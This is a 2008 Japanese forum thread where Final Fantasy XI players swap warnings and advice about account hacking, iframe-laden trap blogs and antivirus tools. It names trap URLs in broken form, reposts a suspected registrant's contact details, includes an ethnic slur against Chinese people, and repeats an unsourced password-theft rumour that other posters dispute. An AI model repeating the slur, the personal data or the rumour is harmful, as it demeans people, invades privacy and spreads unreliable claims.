325 ：既にその名前は使われています：2008/03/15(土) 16:05:00.42 ID:1ztAgSot: >>324
おっけーー！それが聞きたかったんだ　　マジでサンクス。
326 ：既にその名前は使われています：2008/03/15(土) 16:05:10.60 ID:IO6YvPGZ: >>321
iframeを仕込む手口だけならIframe無効化でOKだが
SCRIPTを仕込んだりと手口を代えてくる可能性はある。

RealPlayerの脆弱性だけじゃなくADODBの脆弱性やらExcelの脆弱性やらいろいろ
ついてくるのでRealPlayerのアンインスコだけでは安心はできない。
WindowsUpdateいやさMicrosoftUpdateでOfficeも含めてUpdateすべきか。
327 ：既にその名前は使われています：2008/03/15(土) 16:28:23.41 ID:Sc3cVJvp: 今時Realプレイヤーとか必要無いしな
328 ：既にその名前は使われています：2008/03/15(土) 16:30:19.91 ID:wi4xW8t0: とうとうネ実にも罠URLつきスレたてがはじまったなｗ

忍ソロ記事メインのブログです
FF11ギル RMT　好評につき大幅値下げいたしました

の２つのスレをとりあえず確認
URLは割愛
329 ：既にその名前は使われています：2008/03/15(土) 16:33:01.28 ID:j5yWfBJ0: Micorosoft Updateで更新できるのはOffice 2003以降のみ
Office 2000以前を使っている場合はOffice Updateを手動でやらないと

各種アップデートを済ませたあとでSecuniaのPSIで調べときー
PSIが最新版だとレポートしてもReal Playerはアンインストール
330 ：既にその名前は使われています：2008/03/15(土) 17:23:18.28 ID:7SuVNF8h: >>294
ただいま帰宅す。やはりそれでおｋですね。安心しました、ありがとうです。

Noscript紹介してくれた方にも改めて御礼します。
更新時の一瞬の暗転画面は如何なる仕業なんでしょうかね？ちょっと怖いので気になるのです；；
331 ：既にその名前は使われています：2008/03/15(土) 17:51:51.19 ID:Q1L8MLpo: >>330
板違いだからソフトウェア板で聞いてくれ。
あらかじめ言っておくがFirefoxスレと
Firefox質問スレとFirefox拡張スレは別だからな。
332 ：既にその名前は使われています：2008/03/15(土) 18:26:50.05 ID:C2cVupHk: 質問

パソコン(昨年10月にインスコして一回のみイン)とPS2(メイン)でやってます。
この度、パソコンからアンインストールしようと思うんですが、
アンインストールすれば、アカウントやパスワードの情報が無くなりますか？
OSの再インストールしないとダメ？
333 ：既にその名前は使われています：2008/03/15(土) 18:33:45.52 ID:Ks96FlUy: すでにキーロガーなどが仕込まれてなければ
アンインストールしたら情報は漏れない。
ウィルスに感染してるか調べられないなら
PS2でパスワード変更をして、OSの再インストールしとき。
334 ：既にその名前は使われています：2008/03/15(土) 18:40:39.70 ID:M1DiBH3o: >>332
分からなくて怖くて時間有るならフォーマット→再インストコンボマジお勧め。
明日休みで出かける用もないならFFしながらOS再インストしてればいいじゃん。

>>328
罠付きスレは昔にもあった気がする、ネトゲ狙いとかじゃなくてブラクラとかも。
335 ：既にその名前は使われています：2008/03/15(土) 18:46:43.33 ID:Waas72RN: キーロガーって何かに引っかかる？
ウィルスとして感知される以外のタイプってあったっけ？
336 ：既にその名前は使われています：2008/03/15(土) 18:51:27.14 ID:6XKSBp5p: Windowsupdateおすとページに飛んだあと固まるんだけどなんでだろ
337 ：既にその名前は使われています：2008/03/15(土) 19:02:50.93 ID:88lC05aF: >>336
ああ、あのページすぐ混雑するんだよ。
空いてる時にアクセスするか
オートアップデート待つかしたほうがいいんじゃない。
恒常的にDOS攻撃でも食らってんのかね?w
338 ：既にその名前は使われています：2008/03/15(土) 19:03:39.61 ID:C2cVupHk: ありがとうございます。

今日は時間がなく、明日は家を空けてしまうので、アンインストールとPS2でパスワードを変更してみます。

アンチウイルスはバスターを使っていますが、大丈夫でしょうか？
バスターは穴が多いと耳にしたので…。
WindowsUpdate、バスター共に最新の状態にし、バスターは3日ごとに検索を行っています。
339 ：既にその名前は使われています：2008/03/15(土) 19:15:35.28 ID:EX3W9S/i: 金曜夜にかならずパスワード替えるだけでも自衛になりそうだ。
トロイ仕込まれてたらそれも効果ないが。
340 ：既にその名前は使われています：2008/03/15(土) 19:23:19.13 ID:Lh35v6rs: >>338
この前ウイルスバスターの製作会社である
トレンドマイクロのＨＰが改ざんされて
一部のページでウイルス仕込まれてたことがつい最近あった
ウイルスの中身はネトゲーの情報を盗み出すもので新聞にものった
アンチウイルスサイトでも安心しないように
341 ：既にその名前は使われています：2008/03/15(土) 20:12:50.84 ID:6XKSBp5p: >>337
ありり。まさかそんなアホな理由だったとわ
342 ：既にその名前は使われています：2008/03/15(土) 20:57:24.68 ID:M1DiBH3o: パーソナル・チェック天野氏、オンラインゲームの不正対策最新事情を紹介
最重要かつ安価な対策は「ユーザーへの啓蒙活動の強化」
ttp://www.watch.impress.co.jp/game/docs/20080315/amano.htm

ユーザーにとって都合の良い記事。
343 ：既にその名前は使われています：2008/03/15(土) 22:28:24.59 ID:kclaiJU4: IEからOperaにしてみたんだけど、ブラウザの設定はこれだけで良いだろうか？
バージョンは9.26、Java・Javascript・iframeの無効
見慣れてないし、何か設定し忘れてないか不安だ
344 ：既にその名前は使われています：2008/03/15(土) 22:53:49.40 ID:ySPAXNeT: >>338
自分もバスターだけど、他の自衛に気を配るようになったら
驚くほど感染しなくなった
期限切れるまで使うので問題ないと思うよ
それ以上に必要なのは自衛意識絶えず念頭においてる事かと

>>343
設定で非表示にしてれば、たぶん今まで普通に見れていた普通のサイト(安全な)が
あちこち以前みたいには表示されなくなるから　
設定効いてるなと実感するんじゃないかな
(公式系のサイトほどJVスクリプトやインラインフレーム多様してる)　

そんな時はその時だけ表示させたりと臨機応変に
345 ：既にその名前は使われています：2008/03/16(日) 00:02:07.11 ID:XD+Rz95R: hoshu
346 ：既にその名前は使われています：2008/03/16(日) 01:08:16.89 ID:HBt8XJPp: 保守
347 ：既にその名前は使われています：2008/03/16(日) 02:20:05.69 ID:2ZSmCLDY: hujio
348 ：既にその名前は使われています：2008/03/16(日) 02:21:37.59 ID:3FSoiyKa: 　|　 (^o^)ﾉ　| ＜おやすみー
　|＼⌒⌒⌒ ＼
　＼|⌒⌒⌒⌒|
349 ：既にその名前は使われています：2008/03/16(日) 06:39:45.94 ID:3JZ5LaS4: 啓蒙保守
350 ：既にその名前は使われています：2008/03/16(日) 09:25:05.66 ID:Sje/ZfVs: hosyu
351 ：既にその名前は使われています：2008/03/16(日) 09:47:41.84 ID:e1WsrWPX: あげてみる
352 ：既にその名前は使われています：2008/03/16(日) 10:14:09.97 ID:CLxRNcXl: 起きて飯食ったばっかでボーっとしてたから
嘘ニコニコアド踏みそうになったぜ
353 ：既にその名前は使われています：2008/03/16(日) 12:26:07.95 ID:EBGOnu/0: ちょっと質問だけど、
PS３でFFやってる場合、
PS３のプラウザで情報見たりしてたら
危ないという事ある？
354 ：既にその名前は使われています：2008/03/16(日) 13:18:14.54 ID:NQZi8LGX: >>353
今のところPS3用のウイルスは出回ってないから大丈夫だと思う
狙われにくさとしてはMacみたいなもんだ。使用者が少ないから狙われない。
PS3でのネットブラウズが普及したら危なくなるだろうけど
355 ：既にその名前は使われています：2008/03/16(日) 15:20:31.18 ID:bPDz6Zpr: 注意喚起あげ
356 ：既にその名前は使われています：2008/03/16(日) 17:02:43.36 ID:8K+fUF5K: 最近危険って言われてるFC２のエフエフ系ブログに
スポンサーサイト、みたいな見出しで空の記事が一番上に乗ってたんだけど
それも罠？今日２個ぐらい見たけど…

小心者なのでOS入れ直し中
357 ：既にその名前は使われています：2008/03/16(日) 17:05:49.42 ID:v6WncTD/: それは更新しないで一定時間たつと自動的に載るやつじゃないかな
358 ：既にその名前は使われています：2008/03/16(日) 17:09:49.93 ID:dQ0dwudX: それ仕様だよ
１ヶ月以上更新ないブログには自動的に広告記事がつく
記事の後ろの方に注意書きあったと思うんだが
359 ：既にその名前は使われています：2008/03/16(日) 17:20:38.98 ID:52oLEWSy: バハムート
ナシュモにて一般PCっぽい名前を付けているが称号：天晶堂会員、ハルシオン＋
ローグ針の定番組合せで釣っているので業者と判明。
Vesont、Nyem、Wanb
360 ：既にその名前は使われています：2008/03/16(日) 18:16:31.86 ID:HBt8XJPp: >>359
それはこっち
RMT業者を通報しまくれ ver.10
http://live27.2ch.net/test/read.cgi/ogame/1204788506/
361 ：既にその名前は使われています：2008/03/16(日) 19:32:19.64 ID:8K+fUF5K: >>357 >>358
そうなんですか！怖くてすぐ閉じちゃったから見てなかった…
思い切って聞いてみてよかった。本当にネ実の人は神様だ…ありがとうございます
362 ：既にその名前は使われています：2008/03/16(日) 19:49:03.52 ID:Z9qxHOtt: >>361
でもその用心深さは大事

油断するとやはり怖いのがネット
363 ：既にその名前は使われています：2008/03/16(日) 21:17:21.06 ID:E6/tu8nd: しっかしクソシナがネットを積極的に利用するようになってから
ネット内の危険度が一気に上がったよなぁ。
１０年前なんてアングラや地下サイトみたいな余程危険な場所で
ない限り感染なんて殆どと言っていいくらいなかったってのに。
中国をインターネットから切り離して欲しいよ全く。
364 ：既にその名前は使われています：2008/03/16(日) 21:25:36.25 ID:jQLW6O6X: PeerGuardian2でChainaFreeなインターネッツ＾＾
365 ：既にその名前は使われています：2008/03/16(日) 21:35:32.40 ID:yvlyj19n: 被害にあって２ヶ月経ったんだけどまだGMから連絡こねー
調査に数ヶ月かかるって言ってたけどほんと遅いな・・・
366 ：既にその名前は使われています：2008/03/16(日) 22:07:32.15 ID:z+3jOAYI: 催促した方がよくね？
こういうケースでは「こっちはちゃんと待ってるぞ」って姿勢を
見せるのが大事だってクレーマーのばっちゃが言ってた
367 ：既にその名前は使われています：2008/03/16(日) 23:57:15.02 ID:HBt8XJPp: 欲酒
368 ：既にその名前は使われています：2008/03/17(月) 00:40:47.81 ID:xU9h26PP: 保守
369 ：既にその名前は使われています：2008/03/17(月) 01:30:16.93 ID:i1V5BhvL: >>365
そういうのは引継ぎされてなかったらそこでストップされてるので
再度呼び出して状況を確認すべし
■eもそれができないならサポートとかGMとか軽々しく名乗るなというお話し
370 ：既にその名前は使われています：2008/03/17(月) 03:06:47.81 ID:4DKMml4M: おやすみ揚げ
371 ：既にその名前は使われています：2008/03/17(月) 03:33:52.74 ID:o7JPOwuC: PeerGuardian2を入れたらアニメ・ゲーム系のウィキペディアでよく引っ掛かるんだけど
これってウィルス仕込まれてるって事？　ちなみに弾いたのはKorea
372 ：既にその名前は使われています：2008/03/17(月) 03:37:34.63 ID:yYzn3a5T: Wikiの鯖は韓国、韓国IPをブロックしてるのならそりゃ弾くでしょ。
ウイルスとかは多分無い、外部リンクをクリックした場合の保障はできんがな。
373 ：既にその名前は使われています：2008/03/17(月) 03:38:32.01 ID:JMcCr3Xe: >>371
日本語版のウィキペディアのサーバが韓国にあるから
374 ：既にその名前は使われています：2008/03/17(月) 04:29:02.69 ID:RYnFvK6+: ウィルス関係ないかもしれないが、ウィ気開こうとすると
ほぼ１００％ＩＥブラウザ固まる。強制終了せにゃならん・・・これはなぜ？
375 ：既にその名前は使われています：2008/03/17(月) 07:03:49.74 ID:25HBVbOQ: あげー
376 ：既にその名前は使われています：2008/03/17(月) 07:44:13.85 ID:db2J9daA: 課金してないけどＦＣ２閲覧しちゃったage
377 ：既にその名前は使われています：2008/03/17(月) 08:05:08.82 ID:xU9h26PP: >>374
ブラクラでも仕掛けてあるんじゃね？
378 ：既にその名前は使われています：2008/03/17(月) 10:14:00.94 ID:vO3y/plk: 今フレンド登録しただけでPOLのパス
抜かれるみたいだから注意な！
これマジらしいぞ！
379 ：既にその名前は使われています：2008/03/17(月) 10:41:43.03 ID:7t6XNzVf: ソース
380 ：既にその名前は使われています：2008/03/17(月) 11:36:31.71 ID:JcE5Y4/G: >>379
スクエニはユーザーサイドに立った管理をせず、公式サイトと言えども信用に値しないから。
381 ：既にその名前は使われています：2008/03/17(月) 11:44:40.49 ID:McbVlDPD: >>380
なら辞めればいい。
怪しいオンラインゲームはするなって、消費者保護センターからずっと言われ続けてるじゃないか。
382 ：既にその名前は使われています：2008/03/17(月) 12:26:27.39 ID:OZ9iV9bI: 公式落ちた？　重くて開かん
383 ：既にその名前は使われています：2008/03/17(月) 13:45:05.81 ID:a8HwAfoW: >>378
フレンド登録しただけでパス抜きって？？
どういうことだろ、教えて！
384 ：既にその名前は使われています：2008/03/17(月) 14:38:24.26 ID:vO3y/plk: 今それっぽいアカハックにあってた人がいて
スクエニもほぼ犯人は断定してるらしい。
確証をスクエニと警察で調査中。
フレ登録からなので、犯人は日本人。
確かに被害者の持っていた高額品を
バザーしていたのを多数に目撃されてる。

断定は現時点できないが、注意されたし。
伝聞なのでソースもなくてすまん。
ただアカハックされた本人が言ってたアイテムを
犯人と疑わしき奴がバザーしてたのは確認した。
385 ：既にその名前は使われています：2008/03/17(月) 14:41:16.63 ID:McbVlDPD: >>384
おま、それただの噂じゃん。
伝聞ほど信用がないのはないのぜ？
386 ：既にその名前は使われています：2008/03/17(月) 15:01:42.64 ID:LfD/BwWB: 「被害者」は非女キャラだったりしねーだろうな＾＾；
387 ：既にその名前は使われています：2008/03/17(月) 15:02:15.33 ID:M5kl9cnj: ででお鯖のWinoaのことか？これ
388 ：既にその名前は使われています：2008/03/17(月) 15:28:27.33 ID:2unDwBb4: どういうからくりで、フレンド登録からパス抜かれるのだ？
いい加減な嘘を書き込むなよ。
389 ：既にその名前は使われています：2008/03/17(月) 15:34:15.87 ID:vO3y/plk: 手法がバレてないアカハックほど怖いものはないよ。
初めはみんなこんなレスで信じないからなぁ。
確かに信じられないなら無理に信じなくていいよ。
頭の片隅にでもネタとして置いておいて。
用心にはこしたことない。
ででお鯖でも、似たようなコトあったのか？
390 ：既にその名前は使われています：2008/03/17(月) 15:35:57.56 ID:raGHlFOL: >>389
実はソーシャルハックでしたとかいうなよ？ｗ
391 ：既にその名前は使われています：2008/03/17(月) 15:39:31.50 ID:B5AdIeIS: >>389
煽るだけでソースなしの話を信用しろといわれてもな
392 ：既にその名前は使われています：2008/03/17(月) 15:45:34.02 ID:McbVlDPD: >>389
システム面で解る奴が多数いるこのスレで、｢たいかんw｣や｢聞いた話しwww｣を信じろと言われても一蹴されるだけ。
てか、今一蹴されて｢うわー知らないんだー｣と、さらに誇示されても^^;としかだせんわ。

とにかくソース出せー
393 ：既にその名前は使われています：2008/03/17(月) 15:48:39.75 ID:vO3y/plk: ソースが出たらそれこそ祭りになった後
じゃないかなー。
すまんが現時点ではソース無しの妄想と
同じレベルだな。すまんかった。

ROMに戻るわ。ごめんよ(つд｀)
394 ：既にその名前は使われています：2008/03/17(月) 16:07:37.51 ID:McbVlDPD: なんだ。結局暇つぶしの煽りか。

オンライン上で会っただけでパス抜きなんてシステム的に完全不可能。
会ってフレ登録しただけでは、住所が分かったって程度で、そこに入るには鍵が必須。それを知っているのは管理している■と本人のみ。
それで抜かれるなら、本人が教えたか、■が教えたかどちらかしかありえねー

どっちにしろ、フレ登録でパス抜かれるなんて、■に内通者がいないとできっこないし、そんな事会社としてあってはならないwwwww
395 ：既にその名前は使われています：2008/03/17(月) 16:19:18.60 ID:NdwIDi1C: 会社としてはあってはならない事なんて去年いっぱいあったろ

偽装関連とか、会社ではあってはならないことがぽんぽん出てきた。
あってはならないことだから、あるはずがないなんてやってる本人の
火消しにしか聞こえない。
以前もGMが不正やってたんだし、あり得ない話ではないだろ。
396 ：既にその名前は使われています：2008/03/17(月) 16:28:07.05 ID:EdvYq9Nc: >>394
おまえむずかしく書きすぎｗｗｗｗ

つまりフレ登録ごときでパス抜かれるって社員が洩らしてるんだから
フレ登録だけなはずねーだろってことだろ。

たしかにゲームしてるだけで抜かれなきゃおかしいわなｗｗｗ
397 ：既にその名前は使われています：2008/03/17(月) 16:47:43.96 ID:URKwE6OA: >>389
俺も聞いた話だが、ネ実に書き込むだけでも
パス抜かれることがあるらしいよ。
398 ：既にその名前は使われています：2008/03/17(月) 16:48:14.65 ID:OREw96XY: ttp://www.4gamer.net/games/000/G000000/20080314003/

4gamer.netでゲーム運営側にて行う不正アクセス対策ツールの記事。
とても参考になることが書いてあるのでおいてく。

･不正アクセス元の地域認証
･ゲームの接続状況と接続してきた地域を照らし合わせて不正アクセスか判断
･国内の中継地点の先まで特定できるシステムを開発中

自己防衛にも限界があるのはここで散々出ているんだし
ここまでできるソリューションが開発されているんだから
■eももう少し効率的な対策ができるようにして欲しいもんだな。
399 ：既にその名前は使われています：2008/03/17(月) 16:50:55.94 ID:LePJSfHm: もうそれこのスレでも既出
400 ：既にその名前は使われています：2008/03/17(月) 17:05:51.52 ID:7t6XNzVf: 俺も聞いた話だけど公式HP見るだけでもパス抜かれることあるらしいよ
401 ：既にその名前は使われています：2008/03/17(月) 17:12:31.12 ID:NY702PYr: なんかすごいことになってるんだな・・・
このスレ見てて自分も危ないかもって思ったから早速パス変えてくる！
402 ：既にその名前は使われています：2008/03/17(月) 17:13:27.62 ID:L0YgFMbw: 俺も噂で聞いた話だけどウィルスチェッカーの公式見に行くとウィルス仕込まれるらしい
403 ：既にその名前は使われています：2008/03/17(月) 17:21:45.24 ID:sNasDmha: >>402
それ、ウィルスバスターの公式ページな。

ソースはこれ：http://ime.nu/itpro.nikkeibp.co.jp/article/NEWS/20080312/296070/
リンク踏むのが怖いなら、「Trendmicro ウィルス仕込まれる」でぐぐると一発。
404 ：既にその名前は使われています：2008/03/17(月) 17:38:38.66 ID:iSbf+cw4: ここ見るようになってブラウザ火狐＋NoScriptに変えたんだが・・・
ＦＦの公式、トピックしか見えなくて吹いたｗ
405 ：既にその名前は使われています：2008/03/17(月) 17:43:42.04 ID:NWZ8vph6: 企業になると当たり前のようにJava前提になってて困る
406 ：既にその名前は使われています：2008/03/17(月) 17:45:58.97 ID:1daMfzIK: Windows Live OneCareでスキャンしてもウィルス出てこなかったんだけど、
ウィルスドクターってやつの無料スキャンしたらウィルス９個発見されたんだが・・
407 ：既にその名前は使われています：2008/03/17(月) 17:49:15.02 ID:1kFnZEgw: OneCareはクソ
でも中華ドクターほどクソじゃなかったと思うがなぁ
408 ：既にその名前は使われています：2008/03/17(月) 17:57:56.46 ID:1daMfzIK: でもなんかそのウィルスドクターってのも怪しいというかなんというか・・

あああ、困る
409 ：既にその名前は使われています：2008/03/17(月) 17:59:57.18 ID:B5AdIeIS: >>408
心配ならカスペルスキーで
410 ：既にその名前は使われています：2008/03/17(月) 18:00:03.98 ID:1kFnZEgw: Kasperskyのオンラインスキャンすればいいだろ
411 ：既にその名前は使われています：2008/03/17(月) 18:06:15.85 ID:1daMfzIK: ありがとう！帰って早速やってみる。正直もう何を信じていいか分からん；；
だがお前等は信じる
412 ：既にその名前は使われています：2008/03/17(月) 18:27:36.33 ID:z8/ZO2JA: カスペルスキーのオンラインスキャンをしようとしたら途中で止まった。
ＩＥのセキュリティレベルを中にしてください。って出たんだけど
もともと中なんだYO。どーしろと？
413 ：既にその名前は使われています：2008/03/17(月) 18:31:54.27 ID:Qaop0X6+: （　´３｀）
414 ：既にその名前は使われています：2008/03/17(月) 18:32:15.37 ID:B5AdIeIS: >>412
なんかカスタマイズな設定してるとか？
415 ：既にその名前は使われています：2008/03/17(月) 18:36:57.32 ID:z8/ZO2JA: >414
うむ。よく見たらちょっとカスタマイズしてｔ
ありがとう。
というわけでもう１回チェックしてきます三 (lll´Д｀)

もう何年もウィルスバスター使ってきたけど結果によっては乗り換えるかも。
416 ：既にその名前は使われています：2008/03/17(月) 18:49:27.94 ID:L0YgFMbw: >403
マジレスされて俺の悲しみがマッハで有頂天になった
417 ：既にその名前は使われています：2008/03/17(月) 18:50:23.97 ID:TQMBeUEV: 最近垢ハックマジでやばそうなので
Peerguardian2を導入してみたんだけど、
FFしてるだけなのにたまに中国からの送信をブロックしてるんだが。
これってもう何かに感染してるのか・・・？
パス変えたほうがいいのかな・・・。
418 ：既にその名前は使われています：2008/03/17(月) 19:02:19.69 ID:Bk9IXFvS: ヤプログドメインでも罠ブログの米きたぞ
ttp:■■yaplog.jp■Koyuko■

iframeで既出の罠URL埋め込んであった
419 ：既にその名前は使われています：2008/03/17(月) 19:05:19.13 ID:4DKMml4M: >>417
履歴を表示＞ブロックのあった日を選択＞ブロックのタブ
でブロックしたIPを確認できるから、それをぐぐるなりしてまず調べるべし
ウィキペが韓国鯖だし一般のサイトでも台湾IPのこともあるよ。
420 ：既にその名前は使われています：2008/03/17(月) 19:28:34.66 ID:TQMBeUEV: >>419
おお、ありがと～。
クリックボードにコピーでIPコピってググると、
一応普通のサイトが引っかかるっぽい・・・？
WIKIが韓国鯖なのか。
ウィンドウモードでやってるんだけど、調べ物のために、
WIKI後ろでつけっぱにしてるから、これが原因なのかな？
まぁ垢ハックされてたらもうすでに無事じゃないだろうし、
とりあえず大丈夫なのかな～。
SpybotとAVGでもなにも検出されないしなぁ。
421 ：既にその名前は使われています：2008/03/17(月) 19:31:23.65 ID:LePJSfHm: ついでに言うと台湾や韓国にもWindows Updateの鯖があるからな
422 ：既にその名前は使われています：2008/03/17(月) 19:47:51.25 ID:dEANFXh8: 中華の罠ドメインを見つけたんで気をつけてくれよな！
Domain name: bluewoon■com

Registrant Contact:
lin guan xi
guanxi lin abc00623@163■com
05972882502 fax: 13860208056
fujianshenglongyanshixianlu28hao
longyan Fujian 364000
cn
Created: 2008-03-08
423 ：既にその名前は使われています：2008/03/17(月) 19:56:18.69 ID:uYG9Czbe: スレチで申し訳ないが、
なんか、下のスレ開いたら、カスペで「トロイの木馬」の
警告が出たんだけど、うちだけかな。

【株安すげえｗｗｗｗ円高すげえｗｗｗｗ】

URLは、ヤバそうなので貼らないでおく。
怖いのでスレ内容は、見てない。
424 ：423：2008/03/17(月) 20:13:18.22 ID:uYG9Czbe: カスペの誤認かも知れないが、マジだとヤバイと思ったので、
急いで投稿しちまった。
↑のスレは見ないほうがいいかも。
425 ：既にその名前は使われています：2008/03/17(月) 20:30:59.43 ID:B5AdIeIS: >>424
レスでウイルスチェッカー引っかかるコードはっつける奴がたまにいる
実害は少ないいと思う
426 ：既にその名前は使われています：2008/03/17(月) 20:33:52.74 ID:uYG9Czbe: >>425
なるほど。レスあり。
427 ：既にその名前は使われています：2008/03/17(月) 20:36:17.10 ID:WwdotSIP: >>423
2chに直接ウイルス貼り付けることは出来ないぞ。
そんな機能が付いて無いからな。
罠リンク張られたとかそんなかんじじゃないの。
428 ：既にその名前は使われています：2008/03/17(月) 21:04:44.40 ID:NWZ8vph6: トロイのプログラムソースの一部が書き込まれてるとそれを検知したノートン先生が怒るとかいうのは昔からある嫌がらせの一種である。
429 ：既にその名前は使われています：2008/03/17(月) 21:20:27.44 ID:L0YgFMbw: Cシェルのスクリプトっぽいのがメール欄に書かれててそれにノートンが反応って嫌がらせは昔よく見たなｗ
430 ：既にその名前は使われています：2008/03/17(月) 21:30:23.46 ID:NPlRSzYF: ラブレターなんかは今でもたまに見かけるなｗ
ノートン使いだった俺涙目だったは
431 ：既にその名前は使われています：2008/03/18(火) 00:03:17.01 ID:F9Kq2TNY: banおめでとうスレ落ちたので焦って保守
432 ：既にその名前は使われています：2008/03/18(火) 00:35:05.28 ID:oug738eB: ほ
433 ：既にその名前は使われています：2008/03/18(火) 01:22:31.88 ID:NcFWNaqV: しゅ
434 ：既にその名前は使われています：2008/03/18(火) 01:36:37.64 ID:k3yly/k7: RMT業者、購入者BANおめでとう！Part46
http://live27.2ch.net/test/read.cgi/ogame/1205771503/
435 ：既にその名前は使われています：2008/03/18(火) 02:29:30.76 ID:Fc6V9Eki: FFメンテは各種ソフトのアップデートとウイルスチェックをやるいい機会
寝る前にやっときましょう
436 ：既にその名前は使われています：2008/03/18(火) 02:32:26.09 ID:soLD71iz: FFAHトロイ検出されてわろたｗｗｗｗｗｗｗｗｗｗｗｗｗｗ
onecareうんこすぎｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗ
437 ：既にその名前は使われています：2008/03/18(火) 02:42:51.32 ID:AT9B625w: 今ヤプログ系のブログみたら警告音が鳴ったんだがなんだろう・・・
438 ：既にその名前は使われています：2008/03/18(火) 02:48:21.66 ID:XhCtKqXc: ヤプログでも出回ってるらしい。
439 ：既にその名前は使われています：2008/03/18(火) 05:45:45.75 ID:yy32Df4z: ブラックリスト更新したage
440 ：既にその名前は使われています：2008/03/18(火) 08:07:22.41 ID:F9Kq2TNY: 現金持ってるヤツは専用クライアント用意しろ、
無い奴は課金停止してフォーマット→OS再インストールして状況改善されるまで待て。

ッて言う保守。
441 ：既にその名前は使われています：2008/03/18(火) 10:02:21.96 ID:oug738eB: ほ
442 ：既にその名前は使われています：2008/03/18(火) 11:22:33.48 ID:NcFWNaqV: しゅ
443 ：既にその名前は使われています：2008/03/18(火) 12:50:11.78 ID:b8cgs+2B: いまAVGのフリー版使ってるんだけど、対策としてはこれじゃ足りない？
罠サイト踏んだときにちゃんと検出してはくれたんだけど、
ファイアウォール機能がないから別途入れたほうがいいとかどこかで聞いたんだが。

フリー最強の組み合わせ教えてください
ゲーム妨げない程度の軽さ、安定性も考慮したりすると。
444 ：既にその名前は使われています：2008/03/18(火) 13:01:13.79 ID:oug738eB: >>443
【無料】フリーセキュリティの組合せ 6
http://pc11.2ch.net/test/read.cgi/sec/1204693757/
【PFW】フリーファイアウォールベストスレPart15
http://pc11.2ch.net/test/read.cgi/sec/1200892526/
最強のPCセキュリティーコンボ（フリー限定） Part3
http://pc11.2ch.net/test/read.cgi/sec/1175726576/
【PFW】ファイアウォール総合
http://pc11.2ch.net/test/read.cgi/sec/1167117926/

辺り見て自分で研究汁。経験に勝る最強なし。
445 ：既にその名前は使われています：2008/03/18(火) 14:05:29.54 ID:eep8T4HG: ZoneAlarmやOutpostみたいに、Proはまともだが
Freeはどうしようもないものもあるので注意な。
上記スレに出ているであろうmatousecのリークテストを参考に。
446 ：既にその名前は使われています：2008/03/18(火) 15:07:49.17 ID:/H7ikP8D: 対垢ハックに特化したいのならPG2でいいんじゃないかな
リネ資料室のブロックリストでサポートされてるし
447 ：既にその名前は使われています：2008/03/18(火) 15:27:31.13 ID:njRasgau: 課金ボイコットを広めよう！！
http://live27.2ch.net/test/read.cgi/ogame/1205810793/
448 ：既にその名前は使われています：2008/03/18(火) 16:10:47.28 ID:PMSeEqXI: 今までの罠系で、iframeで読み込ませるサイトが中華鯖ばっかな気がするけど
他国のって今までにあったっけ？
rarとかは米のレン鯖とかあったけどさ
そういうの詳しくないから分らんが、他国だとまずかったりするん？
449 ：既にその名前は使われています：2008/03/18(火) 16:22:05.48 ID:1j1VO+YQ: 今は中華鯖ばかりだがいずれ他国鯖を使い出すのはだろうな
おそらくそんなに時間は掛からないとおもうよ
450 ：既にその名前は使われています：2008/03/18(火) 17:52:07.51 ID:BF4idaBL: うふふ
451 ：既にその名前は使われています：2008/03/18(火) 19:08:16.94 ID:gYT3Yy72: >>448
ウイルスをばらまいてる鯖は全世界でも中国が50％を占めると言われてる。
有害サイト作ってても管理が甘く処分しないからやり放題らしいな。
ウイルス全般で言えばアメリカ、ロシア、オランダ等も多いようだが
とりあえずFF関連では中国のみ。今のところはの話だけど。
452 ：既にその名前は使われています：2008/03/18(火) 19:17:03.15 ID:F9Kq2TNY: リネ2とかのトンネリングで逮捕した様な状況を作るために
中国の様なネット犯罪は一切協力しません、
ッて言うスタンスの国からのアクセスは弾いて欲しいな。

とりあえずそこからだろう。
453 ：既にその名前は使われています：2008/03/18(火) 19:23:34.37 ID:6fqa9BMn: >>443
FFXIのアカハック（パス抜き）には例え有料でも効果があるか分からない。
AVG＋peerguardian2がいいよ。
それと、ブラウザのjava scriptはオフをデフォにする。必要なサイトで
中身が安心な所は手動でオンにしたほうがいい。
Sleipnirならステータスバーをクリックするだけで見てる対象ページだけ
オンオフ設定出来ていい。
454 ：既にその名前は使われています：2008/03/18(火) 19:38:19.07 ID:u4ddQA1e: >>436
よく聞く話だけど実際はトロイ出てこないよ?
なにか反応あったんなら具体的にトロイの内容書いてくれ。
455 ：既にその名前は使われています：2008/03/18(火) 19:43:29.65 ID:k3yly/k7: 似たような名前の罠サイト踏んだか、転売がばれると困る業者だろう

ものすごい間があいてしまってなんだかなぁ　の巻き。
http://ime.nu/ginlog○blog○drecom○jp/

↑何故かエロパロ板のスレに貼られていたがこれもパス抜きだったっぽい
今は閉鎖されてる
456 ：既にその名前は使われています：2008/03/18(火) 19:45:48.88 ID:Ntmz7CiR: peerguardian2ってVistaでも使えるんだろうか
457 ：既にその名前は使われています：2008/03/18(火) 19:46:10.08 ID:053Ion95: Pandemoniumスレに垢ハック被害者出たって書き込みあるね
458 ：既にその名前は使われています：2008/03/18(火) 19:55:57.02 ID:lqp65zww: >>455
このサイトすごい勢いでそこらじゅうのMMO板のスレ貼られているんだが
459 ：既にその名前は使われています：2008/03/18(火) 20:12:41.13 ID:LToNTKNj: 俺も以前、FFAHに掲載されてる広告を踏んでトロイをもらった。
ファイル名しか残ってない。
dbnetlibn.dll
d3dx9_25f.dll
海外のインターネットカジノの宣伝を強制で見せるIEのアドオンだったと思う。
フリーAVGで削除出来なくて、カスペの試用版で削除しようとしたけどダメで、
カスペの豚の鳴き声がうるさくて困った記憶がある。
460 ：既にその名前は使われています：2008/03/18(火) 20:36:49.40 ID:u4ddQA1e: >>459
ああffxiah.comもiframeで広告打ってるけど
その広告にくっついてるってわけか。
恒常的にウイルス検出されず、思い出したようにスレで話題に出るのはそのせいだったのね。

ちなみにffxiah.comでは運営費を広告収入から捻出しているため
RMT広告を選別消去する意思はありませんと表明している。
RMT広告外したら採算割れしたのでという話だが、実際は・・・・？
461 ：既にその名前は使われています：2008/03/18(火) 20:52:32.73 ID:39q0YvmJ: >>456
現状vista対応はしてなかったはず
462 ：既にその名前は使われています：2008/03/18(火) 21:04:50.05 ID:Ntmz7CiR: >>461
ぐわー　対応して無いのか・・・　　ありがとう！
463 ：既にその名前は使われています：2008/03/18(火) 21:24:31.39 ID:oug738eB: >>462
lt;丶｀∀´gt; PeerGuardian2 ★２（｀ハ´ ）
http://pc11.2ch.net/test/read.cgi/sec/1129612402/
